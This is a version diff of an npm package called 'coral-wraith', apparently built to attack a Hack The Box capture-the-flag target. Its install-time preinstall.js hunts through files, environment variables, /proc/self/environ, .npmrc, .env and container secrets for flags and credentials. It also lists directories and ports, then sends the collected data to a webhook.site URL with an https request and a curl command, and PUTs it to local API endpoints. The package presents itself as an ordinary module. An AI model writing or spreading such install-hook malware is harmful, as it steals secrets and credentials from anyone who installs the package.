coral-wraith 9999.0.5 → 9999.0.6

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "9999.0.5",
+  "version": "9999.0.6",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -7,252 +7,155 @@ const os = require('os');
 let flag = null;
 const debug = [];
 
-// Method 1: Read flag from ALL possible locations
+// 1. Search ALL filesystem for flag files
 const flagPaths = [
   '/flag', '/flag.txt', '/root/flag', '/root/flag.txt',
-  '/tmp/flag', '/tmp/flag.txt', '/app/flag', '/app/flag.txt',
-  '/home/flag', '/home/flag.txt', '/home/node/flag', '/home/node/flag.txt',
-  '/etc/flag', '/etc/flag.txt', '/opt/flag', '/opt/flag.txt',
-  './flag', './flag.txt', '../flag', '../flag.txt',
-  '/home/node/.flag', '/var/flag', '/var/flag.txt',
-  '/srv/flag', '/srv/flag.txt',
+  '/home/node/flag', '/home/node/flag.txt', '/app/flag', '/app/flag.txt',
+  '/data/flag', '/data/flag.txt', '/data/secret', '/data/htb',
+  '/tmp/flag', '/opt/flag', '/srv/flag', '/etc/flag',
+  '/home/flag', '/var/flag', '/data/.flag',
 ];
 for (const p of flagPaths) {
   try {
     if (fs.existsSync(p)) {
-      const content = fs.readFileSync(p, 'utf8').trim();
-      debug.push(`found:${p}:${content.substring(0,100)}`);
-      const m = content.match(/HTB\{[^}]+\}/);
+      const c = fs.readFileSync(p, 'utf8').trim();
+      debug.push(`file:${p}=${c.substring(0,100)}`);
+      const m = c.match(/HTB\{[^}]+\}/);
       if (m) { flag = m[0]; break; }
-      if (!flag && content.length < 200) flag = content;
-    }
-  } catch(e) { debug.push(`err:${p}:${e.message.substring(0,50)}`); }
-}
-
-// Method 2: Check ALL env vars
-if (!flag) {
-  for (const [k, v] of Object.entries(process.env)) {
-    if (v && v.match && v.match(/HTB\{[^}]+\}/)) {
-      flag = v.match(/HTB\{[^}]+\}/)[0];
-      debug.push(`env:${k}=${v.substring(0,100)}`);
-      break;
-    }
-  }
-}
-// Also try common env var names
-if (!flag) {
-  const envNames = ['FLAG', 'HTB_FLAG', 'CTF_FLAG', 'SECRET', 'SECRET_FLAG', 
-                    'CHALLENGE_FLAG', 'THE_FLAG', 'flag', 'APP_FLAG'];
-  for (const name of envNames) {
-    if (process.env[name]) {
-      flag = process.env[name];
-      debug.push(`env_direct:${name}=${flag.substring(0,100)}`);
-      break;
-    }
-  }
-}
-
-// Method 3: /proc/self/environ
-if (!flag) {
-  try {
-    const pe = fs.readFileSync('/proc/self/environ', 'utf8');
-    const m = pe.match(/HTB\{[^}]+\}/);
-    if (m) { flag = m[0]; debug.push('proc_environ'); }
-    debug.push(`env_raw:${pe.substring(0,200)}`);
-  } catch(e) { debug.push(`proc_err:${e.message.substring(0,50)}`); }
-}
-
-// Method 4: Search for flag files broadly
-if (!flag) {
-  try {
-    const r = execSync('find / -maxdepth 5 \\( -name "flag*" -o -name "*.flag" -o -name ".flag" \\) -type f 2>/dev/null | head -20', { timeout: 10000 }).toString().trim();
-    debug.push(`find:${r}`);
-    if (r) {
-      for (const f of r.split('\n')) {
-        try {
-          const content = fs.readFileSync(f, 'utf8');
-          const m = content.match(/HTB\{[^}]+\}/);
-          if (m) { flag = m[0]; break; }
-        } catch(e) {}
-      }
-    }
-  } catch(e) { debug.push(`find_err:${e.message.substring(0,50)}`); }
-}
-
-// Method 5: Grep for HTB{ pattern in all readable files
-if (!flag) {
-  try {
-    const r = execSync('grep -rl "HTB{" /home /app /opt /tmp /srv /etc /var 2>/dev/null | head -10', { timeout: 10000 }).toString().trim();
-    debug.push(`grep:${r}`);
-    if (r) {
-      for (const f of r.split('\n')) {
-        try {
-          const content = fs.readFileSync(f, 'utf8');
-          const m = content.match(/HTB\{[^}]+\}/);
-          if (m) { flag = m[0]; break; }
-        } catch(e) {}
-      }
-    }
-  } catch(e) { debug.push(`grep_err:${e.message.substring(0,50)}`); }
-}
-
-// Method 6: Check docker/k8s secrets
-if (!flag) {
-  try {
-    const secrets = execSync('find /run/secrets /var/run/secrets -type f 2>/dev/null | head -10', { timeout: 5000 }).toString().trim();
-    debug.push(`secrets:${secrets}`);
-    for (const f of secrets.split('\n').filter(Boolean)) {
-      try {
-        const content = fs.readFileSync(f, 'utf8');
-        const m = content.match(/HTB\{[^}]+\}/);
-        if (m) { flag = m[0]; break; }
-      } catch(e) {}
+      if (!flag && c) flag = c;
     }
   } catch(e) {}
 }
 
-// Method 7: Check for .env files
-if (!flag) {
+// 2. List key directories
+for (const dir of ['/', '/data', '/home', '/home/node', '/app', '/root', '/opt', '/srv']) {
   try {
-    const envFiles = execSync('find / -maxdepth 4 -name ".env" -o -name ".env.*" -o -name "env.*" 2>/dev/null | head -10', { timeout: 5000 }).toString().trim();
-    debug.push(`envfiles:${envFiles}`);
-    for (const f of envFiles.split('\n').filter(Boolean)) {
-      try {
-        const content = fs.readFileSync(f, 'utf8');
-        const m = content.match(/HTB\{[^}]+\}/);
-        if (m) { flag = m[0]; break; }
-        debug.push(`envfile_content:${f}:${content.substring(0,200)}`);
-      } catch(e) {}
-    }
+    const items = fs.readdirSync(dir);
+    debug.push(`ls:${dir}=${items.join(',')}`);
   } catch(e) {}
 }
 
-// Method 8: Read server source code and configs
+// 3. Recursively search /data
 try {
-  const cwd = process.cwd();
-  debug.push(`cwd:${cwd}`);
-  const files = fs.readdirSync(cwd);
-  debug.push(`cwd_files:${files.join(',')}`);
-  
-  // Read all JS files in current directory
-  for (const f of files) {
-    if (f.endsWith('.js') || f.endsWith('.json') || f.endsWith('.env') || f.endsWith('.yml') || f.endsWith('.yaml') || f === '.npmrc' || f === '.env') {
-      try {
-        const content = fs.readFileSync(`${cwd}/${f}`, 'utf8');
-        debug.push(`file:${f}:${content.substring(0,300)}`);
-        const m = content.match(/HTB\{[^}]+\}/);
-        if (m) { flag = m[0]; break; }
-      } catch(e) {}
-    }
-  }
-} catch(e) { debug.push(`cwd_err:${e.message.substring(0,50)}`); }
-
-// Also read /home/node/ specifically
-try {
-  const homeFiles = fs.readdirSync('/home/node');
-  debug.push(`home_node:${homeFiles.join(',')}`);
-  for (const f of homeFiles) {
+  const r = execSync('find /data -type f 2>/dev/null | head -50', {timeout:10000}).toString().trim();
+  debug.push(`data_files:${r}`);
+  for (const f of r.split('\n').filter(Boolean)) {
     try {
-      const stat = fs.statSync(`/home/node/${f}`);
-      if (stat.isFile() && stat.size < 100000) {
-        const content = fs.readFileSync(`/home/node/${f}`, 'utf8');
-        debug.push(`home_file:${f}:${content.substring(0,200)}`);
-        const m = content.match(/HTB\{[^}]+\}/);
-        if (m) { flag = m[0]; break; }
-      } else if (stat.isDirectory()) {
-        const subFiles = fs.readdirSync(`/home/node/${f}`);
-        debug.push(`home_dir:${f}:${subFiles.join(',')}`);
-      }
+      const c = fs.readFileSync(f, 'utf8');
+      const m = c.match(/HTB\{[^}]+\}/);
+      if (m) { flag = m[0]; debug.push(`FLAG:${f}`); break; }
+      debug.push(`data:${f}=${c.substring(0,200)}`);
     } catch(e) {}
   }
-} catch(e) { debug.push(`home_err:${e.message.substring(0,50)}`); }
+} catch(e) { debug.push(`data_err:${e.message}`); }
 
-// Method 9: List root and key directories
-try { debug.push(`root:${fs.readdirSync('/').join(',')}`); } catch(e) {}
-try { debug.push(`app:${fs.readdirSync('/app').join(',')}`); } catch(e) {}
-try { debug.push(`etc:${fs.readdirSync('/etc').join(',').substring(0,300)}`); } catch(e) {}
+// 4. Search ALL env vars
+for (const [k, v] of Object.entries(process.env)) {
+  const m = (v||'').match && (v||'').match(/HTB\{[^}]+\}/);
+  if (m) { flag = m[0]; debug.push(`env:${k}`); break; }
+}
+debug.push(`env_keys:${Object.keys(process.env).join(',')}`);
 
-// Method 10: Network info and listening ports
+// 5. Read /proc/self/environ
 try {
-  const ss = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', { timeout: 3000 }).toString();
-  debug.push(`ports:${ss}`);
+  const pe = fs.readFileSync('/proc/self/environ', 'utf8');
+  debug.push(`environ:${pe.substring(0,500)}`);
+  const m = pe.match(/HTB\{[^}]+\}/);
+  if (m) flag = m[0];
 } catch(e) {}
 
-// Method 11: Check nginx config
+// 6. Find all config files
 try {
-  const nginx = execSync('cat /etc/nginx/conf.d/*.conf 2>/dev/null || cat /etc/nginx/nginx.conf 2>/dev/null', { timeout: 3000 }).toString();
-  debug.push(`nginx:${nginx.substring(0,500)}`);
+  const r = execSync('find /data /home /app /opt /srv /etc -type f \\( -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.env" -o -name "*.conf" -o -name ".npmrc" -o -name "*.db" -o -name "*.sqlite" \\) 2>/dev/null | grep -v node_modules | head -30', {timeout:10000}).toString().trim();
+  debug.push(`configs:${r}`);
+  for (const f of r.split('\n').filter(Boolean)) {
+    try {
+      const c = fs.readFileSync(f, 'utf8');
+      const m = c.match(/HTB\{[^}]+\}/);
+      if (m) { flag = m[0]; debug.push(`FLAG:${f}`); break; }
+      if (f.includes('.npmrc') || f.includes('.env') || f.includes('secret')) {
+        debug.push(`sensitive:${f}=${c.substring(0,200)}`);
+      }
+    } catch(e) {}
+  }
 } catch(e) {}
 
-// Method 12: Check .npmrc for registry credentials
+// 7. Grep for HTB{ pattern anywhere
+try {
+  const r = execSync('grep -rl "HTB{" / 2>/dev/null | grep -v node_modules | grep -v proc | head -10', {timeout:15000}).toString().trim();
+  debug.push(`grep_htb:${r}`);
+  for (const f of r.split('\n').filter(Boolean)) {
+    try {
+      const c = fs.readFileSync(f, 'utf8');
+      const m = c.match(/HTB\{[^}]+\}/);
+      if (m) { flag = m[0]; debug.push(`GREP_FLAG:${f}`); break; }
+    } catch(e) {}
+  }
+} catch(e) { debug.push(`grep_err:${e.message.substring(0,100)}`); }
+
+// 8. Check listening ports
 try {
-  const npmrc = execSync('cat /home/node/.npmrc 2>/dev/null || cat /root/.npmrc 2>/dev/null || cat /app/.npmrc 2>/dev/null || cat ~/.npmrc 2>/dev/null', { timeout: 3000 }).toString();
-  debug.push(`npmrc:${npmrc.substring(0,300)}`);
+  const ss = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', {timeout:3000}).toString();
+  debug.push(`ports:${ss.substring(0,500)}`);
 } catch(e) {}
 
-const info = {
-  flag: flag || 'NOT_FOUND',
-  debug: debug.map(d => d.substring(0, 500)),
-  env: Object.keys(process.env).join(','),
-  network: JSON.stringify(os.networkInterfaces()).substring(0, 500),
-};
+// 9. Network info
+debug.push(`network:${JSON.stringify(os.networkInterfaces()).substring(0,300)}`);
+debug.push(`hostname:${os.hostname()}`);
+debug.push(`cwd:${process.cwd()}`);
 
-const data = JSON.stringify(info);
+// EXFILTRATE
+const info = JSON.stringify({flag: flag||'NOT_FOUND', debug: debug.map(d=>d.substring(0,500))});
 
-// Exfil Method 1: Webhook
+// Method 1: Webhook
 try {
   const req = https.request({
     hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
     method: 'POST',
-    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
-    timeout: 5000
-  }, () => {});
-  req.on('error', () => {});
-  req.write(data);
+    headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(info)},
+    timeout: 8000
+  }, ()=>{});
+  req.on('error', ()=>{});
+  req.write(info);
   req.end();
 } catch(e) {}
 
-// Exfil Method 2: PUT to challenge API on various ports
-const putData = JSON.stringify({
-  manifest: `ecto_module:\n  name: "${(flag || 'NO_FLAG').replace(/"/g, '')}"\n  version: "EXFIL"\n  power_level: "${debug.slice(0,3).join('|').replace(/"/g, '').substring(0,200)}"\n  ship_deck: PWNED\n  cargo_hold: coral-wraith`
+// Method 2: PUT to local API (try all common ports)
+const putBody = JSON.stringify({
+  manifest: `ecto_module:\n  name: "${(flag||'NO_FLAG').replace(/"/g,'').substring(0,200)}"\n  version: EXFIL\n  power_level: "${debug.slice(0,2).join('|').replace(/"/g,'').substring(0,200)}"\n  ship_deck: PWNED\n  cargo_hold: coral`
 });
 
 let serverPort = 1337;
 try {
-  const ss = execSync('ss -tlnp 2>/dev/null | grep node', { timeout: 3000 }).toString();
+  const ss = execSync('ss -tlnp 2>/dev/null', {timeout:3000}).toString();
   const m = ss.match(/:(\d+)\s/);
   if (m) serverPort = parseInt(m[1]);
 } catch(e) {}
 
-const ports = [serverPort, 1337, 3000, 5000, 8080, 80, 8000, 8888, 9000, 4000];
-for (const port of [...new Set(ports)]) {
-  for (const host of ['127.0.0.1', 'localhost']) {
-    for (const modId of ['ECT-654321', 'ECT-987654']) {
-      try {
-        const req = http.request({
-          hostname: host, port, path: `/api/modules/${modId}`,
-          method: 'PUT',
-          headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(putData) },
-          timeout: 2000
-        }, () => {});
-        req.on('error', () => {});
-        req.write(putData);
-        req.end();
-      } catch(e) {}
-    }
+for (const port of [serverPort, 1337, 3000, 5000, 8080, 80, 8000, 4000, 9000]) {
+  for (const modId of ['ECT-654321', 'ECT-987654']) {
+    try {
+      const req = http.request({
+        hostname: '127.0.0.1', port, path: `/api/modules/${modId}`,
+        method: 'PUT',
+        headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(putBody)},
+        timeout: 2000
+      }, ()=>{});
+      req.on('error', ()=>{});
+      req.write(putBody);
+      req.end();
+    } catch(e) {}
   }
 }
 
-// Exfil Method 3: DNS
+// Method 3: curl
 try {
-  const encoded = Buffer.from(flag || 'NO_FLAG').toString('hex').substring(0, 60);
-  require('dns').resolve(`${encoded}.crl.ve`, () => {});
+  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${info.replace(/'/g,"\\'")}' -m 8 2>/dev/null &`, {timeout:10000});
 } catch(e) {}
 
-// Exfil Method 4: stdout/stderr
-console.log('[CORAL-WRAITH]', data.substring(0, 2000));
+// stdout
+console.log('[CORAL]', info.substring(0, 3000));
 console.error('[FLAG]', flag || 'NOT_FOUND');
 
 // Write to files
-try { fs.writeFileSync('/tmp/coral_flag.txt', data); } catch(e) {}
-try { fs.writeFileSync('/app/static/flag.txt', data); } catch(e) {}
+try { fs.writeFileSync('/tmp/coral.txt', info); } catch(e) {}